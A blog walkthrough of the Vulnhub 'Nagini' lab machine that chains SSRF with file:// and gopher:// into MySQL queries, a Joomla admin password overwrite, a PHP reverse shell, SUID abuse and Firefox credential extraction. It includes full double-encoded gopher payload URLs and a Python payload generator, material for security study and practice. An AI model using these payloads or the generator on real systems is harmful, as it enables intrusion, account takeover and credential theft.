Windy's little blog

All the odds and ends of life, and I like CTF.

Vulnhub HarryPotter: Nagini Walkthrough (SSRF with Gopher)

https://www.vulnhub.com/entry/harrypotter-nagini,689/


A very interesting machine; it was my first time doing SSRF with Gopher.


Scan the ports with nmap first.

nmap -sV -sC -p- 192.168.56.99  -oN ports.log



Brute-force port 80 with gobuster; it finds note.txt and a Joomla CMS install.

gobuster dir -u http://192.168.56.99 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt -b 401,403,404,500 --wildcard  -o 80.log



note.txt tells us the site must be reached over HTTP/3. HTTP/3 runs on QUIC, which is UDP (normally udp/443), so a TCP-only scan like the nmap run above never shows it; a `-sU` scan of port 443 would.



Add quic.nagini.hogwarts to /etc/hosts, then build a curl with HTTP/3 support following this guide:

https://github.com/curl/curl/blob/master/docs/HTTP3.md


Now we have a custom curl with HTTP/3 support (the `--http3` flag selects it).



Visiting the site over HTTP/3 gives a second note with two hints: first, there is an internalResourceFeTcher.php; second, there is a backup of the configuration file.



internalResourceFeTcher.php fetches whatever URL we pass in its url parameter and returns the response, which is a textbook SSRF.



With the file:// scheme we can read /etc/passwd.

curl 'http://quic.nagini.hogwarts/internalResourceFeTcher.php?url=file:///etc/passwd'



Next we read Joomla's configuration.php (or the configuration.php.bak the note mentioned) the same way and get the MySQL user name.

The same file also gives the database name and the table prefix Joomla uses (joomla and joomla_, as the queries below show).

curl 'http://quic.nagini.hogwarts/internalResourceFeTcher.php?url=file:///var/www/html/joomla/configuration.php'



After a lot of googling, and thanks to hints from people on the Vulnhub Discord channel, the next step is to use the gopher:// scheme through the SSRF to talk to the local MySQL server and run queries.

Here we need a tool: https://github.com/tarunkant/Gopherus. Run gopherus, choose the MySQL option, give it the user name and the query, and it generates the gopher link. The login packet it builds carries an empty auth response, so this only works because the MySQL account accepts a connection from localhost without a password. Let's try the SQL 'use joomla;show tables;'

gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%67%6f%62%6c%69%6e%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%18%00%00%00%03%75%73%65%20%6a%6f%6f%6d%6c%61%3b%73%68%6f%77%20%74%61%62%6c%65%73%3b%01%00%00%00%01

Then the gopher link has to be URL-encoded once more before it goes into the url parameter (every % becomes %25 and / becomes %2f). PHP percent-decodes the query string once when it builds $_GET, so a single-encoded link would have its NUL and binary bytes decoded into raw characters before curl ever saw the gopher URL. This is important; I was stuck here for a long time.

Then visit the resulting URL from the browser (curl did not work for me here). If no content is displayed, refresh the page a few times.

http://quic.nagini.hogwarts/internalResourceFeTcher.php?url=gopher:%2f%2f127.0.0.1:3306%2f_%25a5%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2567%256f%2562%256c%2569%256e%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2518%2500%2500%2500%2503%2575%2573%2565%2520%256a%256f%256f%256d%256c%2561%253b%2573%2568%256f%2577%2520%2574%2561%2562%256c%2565%2573%253b%2501%2500%2500%2500%2501




Then we can read the contents of the table "joomla_users".

Use gopherus to generate the gopher link for "use joomla;select * from joomla_users;"


gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%67%6f%62%6c%69%6e%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%27%00%00%00%03%75%73%65%20%6a%6f%6f%6d%6c%61%3b%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%6a%6f%6f%6d%6c%61%5f%75%73%65%72%73%3b%01%00%00%00%01


Visit the site again with the double-encoded link, and we get the user name and password hash of "site_admin".

http://quic.nagini.hogwarts/internalResourceFeTcher.php?url=gopher:%2f%2f127.0.0.1:3306%2f_%25a5%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2567%256f%2562%256c%2569%256e%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2527%2500%2500%2500%2503%2575%2573%2565%2520%256a%256f%256f%256d%256c%2561%253b%2573%2565%256c%2565%2563%2574%2520%252a%2520%2566%2572%256f%256d%2520%256a%256f%256f%256d%256c%2561%255f%2575%2573%2565%2572%2573%253b%2501%2500%2500%2500%2501
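To make the two gopher links above (show tables, and the joomla_users dump) less of a black box, here is an added example of my own, not code from the original post or from Gopherus. It rebuilds the payload Gopherus emits for a given user name and query, double-encodes it the way the fetcher needs, and decodes a link back into user name and SQL so you can check what a pasted payload will actually log in as. It assumes MySQL on 127.0.0.1:3306 accepting the user with no password and a fetcher that percent-decodes the url parameter once; the connection attributes (_pid 27255, client version 5.7.22 and so on) are copied from the link above so that the output is byte-identical to it.

```python
"""Rebuild the MySQL-over-gopher payload Gopherus emits for the SSRF above and
double-URL-encode it for the PHP fetcher.

Added example, not code from the original post or from Gopherus.
Assumptions: MySQL on 127.0.0.1:3306 accepts the user with an empty password
(the login packet carries an empty auth response), and the fetcher
percent-decodes $_GET['url'] exactly once before handing it to curl.
"""
import struct
from urllib.parse import quote, unquote, unquote_to_bytes

# Client capability flags as Gopherus sends them (little-endian 0x01ffa685).
# They include CLIENT_PROTOCOL_41, CLIENT_PLUGIN_AUTH, CLIENT_CONNECT_ATTRS and
# CLIENT_MULTI_STATEMENTS; the last one is why "use db;select ..." runs as one query.
CAPABILITY_FLAGS = bytes.fromhex("85a6ff01")
MAX_PACKET_SIZE = bytes.fromhex("00000001")  # 16 MiB, little-endian
CHARSET_UTF8_GENERAL_CI = b"\x21"
AUTH_PLUGIN = b"mysql_native_password"
# Connection attributes copied from the link in the post so the output is
# byte-identical to it; the server does not validate them.
CONNECT_ATTRS = [
    (b"_os", b"Linux"), (b"_client_name", b"libmysql"), (b"_pid", b"27255"),
    (b"_client_version", b"5.7.22"), (b"_platform", b"x86_64"),
    (b"program_name", b"mysql"),
]

# The joomla_users link from the post, kept here to check the generator against.
PAGE_PAYLOAD = (
    "gopher://127.0.0.1:3306/_"
    + "%a5%00%00%01%85%a6%ff%01%00%00%00%01%21" + "%00" * 23
    + "%67%6f%62%6c%69%6e%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00"
    + "%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c"
    + "%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32"
    + "%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c"
    + "%27%00%00%00%03%75%73%65%20%6a%6f%6f%6d%6c%61%3b%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%6a%6f%6f%6d%6c%61%5f%75%73%65%72%73%3b"
    + "%01%00%00%00%01"
)


def _lenenc(s: bytes) -> bytes:
    """Length-encoded string; every string used here is shorter than 251 bytes."""
    assert len(s) < 251
    return bytes([len(s)]) + s


def _packet(body: bytes, seq: int) -> bytes:
    """MySQL packet framing: 3-byte little-endian length, 1-byte sequence id, body."""
    return struct.pack("<I", len(body))[:3] + bytes([seq]) + body


def handshake_response(username: str) -> bytes:
    """HandshakeResponse41 for a password-less account. Sequence id 1: it answers
    the server greeting (seq 0), which the one-way gopher stream never reads."""
    attrs = b"".join(_lenenc(k) + _lenenc(v) for k, v in CONNECT_ATTRS)
    body = (CAPABILITY_FLAGS + MAX_PACKET_SIZE + CHARSET_UTF8_GENERAL_CI
            + b"\x00" * 23                  # reserved
            + username.encode() + b"\x00"   # NUL-terminated user name
            + b"\x00"                       # auth response length 0: no password
            + AUTH_PLUGIN + b"\x00"
            + _lenenc(attrs))
    return _packet(body, 1)


def mysql_gopher_payload(username: str, query: str, host="127.0.0.1", port=3306) -> str:
    """Gopher URL whose selector (after '/_') is the raw client stream: login,
    COM_QUERY, COM_QUIT. Every byte is %xx-encoded, exactly as Gopherus does."""
    stream = (handshake_response(username)
              + _packet(b"\x03" + query.encode(), 0)   # COM_QUERY
              + _packet(b"\x01", 0))                   # COM_QUIT
    return f"gopher://{host}:{port}/_" + "".join("%%%02x" % b for b in stream)


def fetcher_url(gopher_url: str,
                base="http://quic.nagini.hogwarts/internalResourceFeTcher.php") -> str:
    """PHP percent-decodes $_GET['url'] once, so every '%' in the gopher link must
    itself become '%25', or the NUL and high bytes get decoded before curl runs."""
    return base + "?url=" + quote(gopher_url, safe="")


def decode_payload(gopher_url: str):
    """Pull the user name and SQL back out of a gopher link, e.g. to check which
    account a generated payload will really log in as."""
    stream = unquote_to_bytes(gopher_url.split("/_", 1)[1])
    login_len = int.from_bytes(stream[:3], "little")
    login = stream[4:4 + login_len]
    # skip flags, max packet size and charset (9 bytes), then the reserved NULs
    username = login[9:].lstrip(b"\x00").split(b"\x00", 1)[0].decode()
    query_pkt = stream[4 + login_len:]
    query_len = int.from_bytes(query_pkt[:3], "little")
    query_body = query_pkt[4:4 + query_len]
    if query_body[:1] != b"\x03":
        raise ValueError("second packet is not COM_QUERY")
    return username, query_body[1:].decode()


def decode_fetcher_url(url: str):
    """Same check, starting from the double-encoded URL you paste into the browser."""
    return decode_payload(unquote(url.split("url=", 1)[1]))


if __name__ == "__main__":
    link = mysql_gopher_payload("goblin", "use joomla;show tables;")
    print(fetcher_url(link))
    print(decode_payload(PAGE_PAYLOAD))
```

Running it prints the browser URL for "use joomla;show tables;" and confirms that the joomla_users link above decodes to user goblin and the expected query. The same generator produces the UPDATE used further down; multi-statement queries go through because the capability flags set CLIENT_MULTI_STATEMENTS.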



The password hash could not be cracked online, so we overwrite it instead. Joomla still accepts a legacy unsalted MD5 value in the password column (it re-hashes it to bcrypt after the next successful login), so we use the MD5 of the string "password", 5f4dcc3b5aa765d61d8327deb882cf99.

Use gopherus to generate the link for this command:

use joomla; update joomla_users set password = '5f4dcc3b5aa765d61d8327deb882cf99' where username='site_admin';select * from joomla_users;

The trailing SELECT runs in the same request, so if the UPDATE worked the page shows the new hash.




Now we can log in to the Joomla administrator panel as site_admin:password.



In the template editor we can create a new file rev.php containing a PHP reverse shell, or add the reverse shell code directly to the template's index.php.



Start a listener on port 1234 and visit http://192.168.56.99/joomla/templates/protostar/rev.php.



In snape's home folder we find .creds.txt, which holds snape's password base64-encoded.

With that password we can log in over SSH as snape.



Looking for SUID binaries, su_cp stands out.



su_cp simply copies a file from src to dest, with the privileges of its owner, which is what lets us write into hermoine's home. So we can upload our id_rsa.pub and copy it to /home/hermoine/.ssh/authorized_keys.

Then we can log in over SSH as hermoine without a password.




In hermoine's home we find a .mozilla folder.



Copy the whole .mozilla folder to the local machine:

scp -rp hermoine@quic.nagini.hogwarts:/home/hermoine/.mozilla /tmp


Download firefox_decrypt from https://github.com/unode/firefox_decrypt and run it against the copied profile.

It decrypts the logins Firefox saved (logins.json, with the key taken from key4.db), and among them are the root credentials.



Thanks to wish on Discord for the first writeup; you can read it here:

https://vishal-chandak.medium.com/vulnhub-harrypotter-nagini-walkthrough-68259262e9cf





 
